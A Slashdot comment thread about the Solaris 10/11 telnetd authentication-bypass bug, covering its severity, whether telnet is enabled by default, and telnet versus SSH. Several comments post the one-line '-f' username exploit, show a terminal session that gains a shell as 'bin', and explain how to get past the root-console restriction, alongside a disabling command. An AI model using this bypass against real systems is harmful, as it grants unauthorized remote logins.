Solaris Telnet 0-day vulnerability

philos writes "According to SANS ISC, there's a vulnerability in Solaris 10 and 11 telnet that allows anyone to remotely connect as any account, including root, without authentication. Remote access can be gained with nothing more than a telnet client. More information and a Snort signature can be found at riosec.com. Worse, this is almost identical to a bug in AIX and Linux rlogin from way back in 1994."

Why is this a big deal?

[nettdata (88196)]

Who the hell even THINKS about enabling telnet on any box these days?

Re:

[Minwee (522556)]

Well, according to TFA, nobody should.

Re:

[TheGratefulNet (143330)]

nothing WRONG with telnet. I use it all the time.

but ONLY on trusted lans, of course.

I find it quicker than ssh logins. of course its quicker, it has no encryption to do. and the initial seeding (at connect time) also takes a LONG time on some boxes (ssh to a cisco box; come back after lunch and you'll get your login prompt).

telnet over a wan is dumb. telnet over a 10' piece of wire is NOT dumb.

telnet has its place.

Re:

[SatanicPuppy (611928)]

Telnet is dumb! Quicker than SSH? What the hell? Are you streaming video over your SSH connection or what? Most sane people just use it for a remote console, and speed isn't much of an issue in those circumstances...

Opening/enabling telnet is a mistake. Even if you're using it safely, which, in my mind, is across a hub that isn't connected to anything else but the two computers you're talking to you've still got that port open and vulnerable. Using it on a LAN is just begging someone with a packet sniffer t

Re:Why is this a big deal?

[Nasarius (593729)]

Quicker than SSH? What the hell? Are you streaming video over your SSH connection or what?

I think GP is referring to the initial connect handshake. Oh no, it takes an extra 500ms to establish a secure connection. If your network is private enough to feel safe using telnet, you can certainly set up RSA/DSA keys to use SSH without a password, eliminating the time it takes to enter it.

Re:

[SatanicPuppy (611928)]

Well, the encryption will still add a level of overhead to your packet traffic, so the whole thing will be "slower" but, from experience, you can play Zangband in either one and you'll still have to turn the key delay way up to keep it from getting you killed, and that's about the most bandwidth intensive application I've ever run in ssh that could have been run just as well in telnet.

Re:

[TheGratefulNet (143330)]

its NOT 500ms on my cisco boxes.

admittedly, they'd old 'test' junker boxes that I use for netmgt testing. I had to write some expect style scripts to login to them, throw a command, get the buffer output, parse it and disconnect. for each kind of 'thing' I wanted to remotely retrieve.

it took over 20 secs, on SOME cisco boxes, to get a ssh prompt back.

quite unacceptable.

then I used telnet and it was almost instant.

again, if you secure your lan (my 10' piece of PRIVATE WIRE) there is NOTHING wrong with teln

Re:Why is this a big deal?

[bugnuts (94678)]

Security best practices are the same whether you're talking about securing your home network or a military network

No. It's not. The only thing those have in common is considering what you are protecting, and how much risk you wish to take versus the convenience granted. The specifics are immaterial.

The OP is right, he knows his risks and has deemed it acceptable. You and others, having no idea of the risk, deem it unacceptable and are the ignorant ones.

Re:

[SatanicPuppy (611928)]

You are so wrong. The difference is, on the one hand, taking a risk for zero gain on an obsolescent standard, and on the other hand, using the application that is pretty much the standard for this type of communication! You keep acting like there is some kind of mystical benefit to using telnet, and there's just not. What are you guys using 2800 baud modems? What's the worst case with SSH? The encryption can be compromised...making it the same as fricking telnet!

Hmmmm. Decisions, decisions, decisions.

Re:

[SatanicPuppy (611928)]

1) Putty [greenend.org.uk] is free, stable, and easy to use.
2) service telnetd stop;service sshd start
3) Hitting "Y" one time is too much bother for you?
4) Non-issue on all but the slowest hardware.
5) I don't see how that is a benefit...

Re:

[ePhil_One (634771)]

It may take _that_ long on a sparc box, but stick some nice amd opterons in there and you'll never even notice.

Thats nice and all, but I believe the GP was referring to systems w/ embedded processors, where thast not an option, and I also think he was whining about the initial key gereation (that first time you set it up process), which can take a bit of time on embedded processors. As an example, the Pix 515 has a lowly Pentium 166 at its core, the heavy math of calculating big primes can take a while.

Re:Why is this a big deal?

[arth1 (260657)]

Vendor support for ssh is one factor. Many companies have aversions to installing software unless it's backed by FULL support from the vendor. Having to go to a third party, like F-Secure, to get vendor support is often undesirable, and unfortunately, security can lose to support requirements, service level agreements and response time. Even worse is that there's multiple and sometimes incompatible versions of SSH out there - what may come with one system isn't guaranteed to work with another.
Can you get the OS vendor to jump and have a man there within 30 minutes to fix it if a supported OS function doesn't work? Yes. Can you get the OS vendor to jump and have a man there within 30 minutes if OpenSSH doesn't work? No. Sometimes it's as simple as that, unfortunately.

That said, don't think that I believe telnet is a good substitute for ssh, but often, and especially in a turtled environment (hard on the outside, soft on the inside) where five nines are more important than internal security, it may still be a better choice, at least until all the OS vendors provide fully supported (and compatible!) versions of SSH.

Re:

[walt-sjc (145127)]

If ssh on your cisco boxes is slow, you either have serious network problems or your cisco box has been end-of-life for 10 years. If you don't practice security inside your network, you are asking for trouble. Perimeter-only security is Sooo 1990. Time to join the next century.

Re:Why is this a big deal?

[mi (197448)]

If ssh on your cisco boxes is slow, you either have serious network problems [...]

Most likely, the reverse DNS is misconfigured. This is the number one reason for ssh-login delays. Maybe, the nameservers initially put into the router's configuration are no longer reachable due to subsequent "hardening". Or, maybe, they went away and were replaced long ago — without anybody telling the routers. Nothing else on a router uses DNS usually, so this problem affects only ssh-daemon and gets blamed on it...

The daemon could, of course, be a little bit smarter and not try to do a reverse DNS, when there are no hostname-based authorization rules in the first place... But that's a minor bug compared to reverse DNS being dysfunctional.

Re:

[drsmithy (35869)]

Who the hell even THINKS about enabling telnet on any box these days?

Sun, apparently, since it's enabled by default.

Re:Why is this a big deal?

[dknj (441802)]

except it's not... (at least not as of the 10/06 release)

Re:

[jaymzter (452402)]

I have 11/06, and believe me, I was surprised to find telnet enabled.

Re:Why is this a big deal?

[arth1 (260657)]

Since the exploit site didn't yet have information about older versions of Solaris/SunOS, I hope it can quench the panic for some when I say that only Solaris 10+ appears to be affected.

If you're on Solaris 8 (SunOS 5.8 or Solaris 2.5.8) or 9 (SunOS 5.9, or Solaris 2.5.9), you appear to be safe.

This is relevant because large companies seldom jump to the newer versions until they have to - for production systems, as long as the older versions are supported and working, that's more important than gambling on existing software still working if upgrading the OS. So there's an awful lot of systems with Solaris 8 and 9 out there, but luckily they appear not to be affected.

Re:

[udippel (562132)]

Whatever the SUNny fanboys have / had to say:
Only in Solaris 10 11/06 was it disabled, and only if SBD was selected.
This sheds a wholly new light on 'Secure By Default':
Disabling telnet ! Yahoo ! - if SBD is set.

Re:Why is this a big deal?

[imikem (767509)]

Relevant line from /etc/services:

telnet 23/tcp imadumbass hackmenow rootrus rotflmao

Re:Why is this a big deal?

[teslar (706653)]

I do. And then I sit down naked in the snow and castigate myself with a 9-tail as a punishment for these impure thoughts.

Having said that, today is a good day to find out if that head of IT you never liked anyway has telnet enabled on one of his Solaris machines :)

Who uses telnet these days?

[deevnil (966765)]

towel.blinkenlights.nl, that's who.

Re:Why is this a big deal?

[bockelboy (824282)]

Let me take a crack at this:

1) Fermi National Accelerator Laboratory.

That'll account for a couple thousand computers. It's left as an exercise for the reader to find other sites.

Are they just crazy? I know that almost every single box at FNAL has the telnet daemon running, and is behind no firewall. Why aren't they hacked-to-death? Kerberos.

FNAL has a policy that every service beyond central IT's web pages is protected by Kerberos. The Kerberos-enabled version of telnet is as secure as one can get; I've been told by their sysadmins that it is more secure than SSH because it is simpler and the network and authz/authn stacks are separated. So, historically, Kerberos-enabled telnet has had less bugs than SSH.

Just because YOU don't run telnet (or don't know how to run it securely) doesn't mean that there aren't thousands of boxes out there that are secured by it.

If there are actually any Sun boxes at FNAL (they were one of the original big adopters of Linux), you can bet they'll probably be turned off today...

Re:

[SatanicPuppy (611928)]

Just to nitpick, nothing is secured by telnet. Just because the login is "safe" doesn't mean that using an unencrypted protocol is ever a good idea.

Re:Why is this a big deal?

[evilviper (135110)]

Just because the login is "safe" doesn't mean that using an unencrypted protocol is ever a good idea.

You're right... No more secure websites for you, since HTTPS is just HTTP over an SSL data stream.

You could just as easily use Kerberos to encrypt HTTP traffic as SSL, and that is indeed exactly what Kerberos does for just about any communications protocol...

Kerberos telnet is as encrypted as it gets.

Re:Why is this a big deal?

[SatanicPuppy (611928)]

Sounds like they're more interested in watching their own employees than in securing their systems from external threats.

If it were me I'd just log everything in every session (which is easy), and make the users use SSH. That way you can audit everything they do, every command they type, but still have a level of security. You have to remember that any user can sniff telnet traffic on the network, so forcing everyone to use telnet because you don't trust them means the ones who are untrustworthy have a better chance of stealing something useful from a coworker.

Even better would be to hire trustworthy people and treat them as such in the absence of evidence to the contrary.

Re:Why is this a big deal?

[99BottlesOfBeerInMyF (813746)]

Who the hell even THINKS about enabling telnet on any box these days?

Sadly, a whole lot of people. I work for a company that makes very expensive and cool specialty servers that perform certain security related functions. As a security company, naturally we take care not to tarnish our reputation by leaving these servers vulnerable themselves. We try to encourage our customers to be moderately responsible as well, as any box can be made insecure. I know of at least on tier-1 ISP that has one of our boxes sitting publicly accessible with telnet enabled and no IP access restrictions.

As for who uses telnet in general, most ISPs in Asia seem to use telnet to configure their systems via their control networks. Large financial institutions in Europe use telnet, as use of encryption is restricted on their trusted networks, for reasons of transparency to the stock regulating authorities. ISPs in South America often use telnet and provide shell accounts to customers. I'm sure there are more groups that use it for one reason or another.

not an excuse

[otacon (445694)]

"Nobody should be using it anyways" is not an excuse. If it is included, it should be held to the same standard as every other application. In some legacy cases I'm sure telnet is of some use. But regardless the fact that it has a practical use or not is irrelevant.

the authors seem very confused ...

[petes_PoV (912422)]

First they say there's a bug with telnet passing switches through to login.
Then they start a tirade against sending passwords in the clear.
After that they say the fix is not to use telnet.

Putting aside the holier (more secure) than thou attitudes here about telnet security. I've got to say that not using something because it's broken is never a fix (unless you're a manager). The fix is to mend the problem. In the meantime, maybe, avoid the service. but bear in mind, someone still has to fix it.

0-day?

[Aladrin (926209)]

Maybe I'm just confused, but doesn't '0-day' mean the exploit was found the day the code in question was released?

I generally don't follow Solaris, and 11 might have just come out, but I seriously doubt 10 and 11 both came out at the same time.

Re:0-day?

[walt-sjc (145127)]

No, zero day means that an exploit was released before or on the same day as the vendor / community found out about it. Ethical security researchers notify the vendor first, and at LEAST give them a few days / weeks to resolve the problem before releasing the full details to the public.

The Exploit

[biftek (145375)]

Since noone seems to have bothered posting it yet, "telnet -l -frandomuser randomsolarishost".

So stupid.

Didn't work on Solaris 10 01/06

[jaymzter (452402)]

rhlinux1:~$ telnet -l"-froot" solaris
Trying 172.16.141.27...
Connected to solaris.example.com (172.16.141.27).
Escape character is '^]'.
Not on system console
Connection closed by foreign host

This is basically a vanilla install.

Re:

[by Anonymous Coward]

telnet -l"-fbin" solaris

Re:

[jaymzter (452402)]

That did work. One correction however... I'm using Solaris 10 11/06, not 01/06

rhlinux1:/09:01:01~$ telnet -l"-fbin" solaris
Trying 172.16.141.27...
Connected to solaris.jaymzworld.test (172.16.141.27).
Escape character is '^]'.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ uname -a
SunOS solaris 5.10 Generic_118855-33 i86pc i386 i86pc
$ id
uid=2(bin) gid=2(bin

I ran the following to disable telnet
inetadm -d svc:/network/telnet:default

I just got this in my inbox from Microsoft

[kentrel (526003)]

To: You Unix Communists
From: Steve Ballmer
Subject: Pwned
Body:
Microsoft:1 - Unix: NIL LOLOLOLOLOLOL!!!!!!!111

:)
Love Steviepoo

telnetd NOT on "by default" in Solaris 10

[BrianRoach (614397)]

When you install Solaris 10, you are prompted for how you want remote access to the box initially configured. This is done in phase 1 of the install, running off the install media.

You can either turn on everything (telnetd, ftpd, etc, etc), or only have sshd running when the box comes up for the first time.

So saying that telnetd is on "by default" isn't exactly correct, unless your definition of "by default" is "explicitly enabled".

- Roach

Re:Here come the fanboys

[SatanicPuppy (611928)]

Just because it's not deployed in many places, doesn't mean that those places aren't cracker dream targets...I've got 5 Solaris machines, and the least critical of them is a far better target than the most critical Windows, or even Linux box.

Still, first poster is right. Wtf uses telnet anymore, unless they're dealing with the most legacy of legacy crap.

Re:

[Rob T Firefly (844560)]

Wtf uses telnet anymore, unless they're dealing with the most legacy of legacy crap.

I'll bet more of the IT-based Slashdotters than would like to admit are forced to support, or at least deal with, the most legacy of legacy crap now and then.

Re:Here come the fanboys

[SatanicPuppy (611928)]

Sure, but that's not what's being discussed. There is a world of difference between using telnet to fake some other non-encrypted protocol, and leaving the telnet service enabled on your machine.

Re:

[aymanh (892834)]

erm... never used telnet to test mail|web|etc-server-connection?

Not anymore, netcat [wikipedia.org] is a better replacement for creating sockets. One of its advantages is the ability to listen to ports.

Re:

[Matt Perry (793115)]

erm... never used telnet to test mail|web|etc-server-connection?

Doing that uses a telnet client. This article is about a telnet server.

Re:

[geoffspear (692508)]

If that MUD is using telnetd instead of using its own socket code, it may not be "the most legacy of legacy crap" but it's certainly the worst MUD software ever written.

Although I suspect you just have no idea what you're talking about and it's not doing that.

Re:

[annodomini (544503)]

The thing is, you can tunnel pretty much anything over anything, and telnet would be pretty easy to tunnel over. In fact, if you really wanted you could tunnel SSH over Telnet, and retain the encryption. So, there is absolutely no reason to leave Telnet unblocked and SSH blocked. Furthermore, in an institutional environment like a school, you could just not install SSH clients, and not give the students sufficient privileges to run their own, which is more effective than blocking particular ports. As long a

Re:

[by Anonymous Coward]

Solaris 8, 9, 10 -- all have telnet, ftp, rlogin and others enabled by default at a clean install.
You can check it for yourself in vmware, if you do not believe.

Re:

[pipatron (966506)]

The bad news is that we have no idea how long people have known about this problem...

But in a closed development model we would have some magic insight in how long people have known about a flaw? I'm sorry, but I fail to see the drawbacks in this case.

Re:Configuration issue

[walt-sjc (145127)]

Since apparently Sun is negligent enough to have telnet enabled by default, it is an important story. This reminds me of the old NT4 days, where every service on the machine was enabled by default, and the first thing you had to do was turn everything off. Come on Sun, get with program here...

Re:Configuration issue

[zdzichu (100333)]

The article talks about Solaris 10 u1 released in 2005. The latest thing is u3, which has two things:

1) this attack does not work:

Escape character is '^]'.
Not on system console
Connection closed by foreign host.

2) when installing U3 one can opt to close most services. This could be also done after installation with "netservices limited" command.

Re:Configuration issue

[moyix (412254)]

This is only because root is not allowed to log in remotely by default. "-fanyotheruser" will still work. I believe the current favorite is "-fbin". Also, if you've commented out the console line in /etc/default/login, it will allow access to root.

This has been confirmed on the latest version of Solaris 10.

Re:

[AtariDatacenter (31657)]

> Escape character is '^]'.
> Not on system console
> Connection closed by foreign host.

Reason that message happened: You succesfully logged in as root. However, /etc/default/login specified that root logins may only be made from the console. Feel free to telnet in as any other user.

And for the people saying, "OMG! Who uses telnet anymore?!?!", remember that with Solaris (at least up until my experience with 10), it comes out of the box with Telnet *enabled*. It isn't people who enabled telnet that a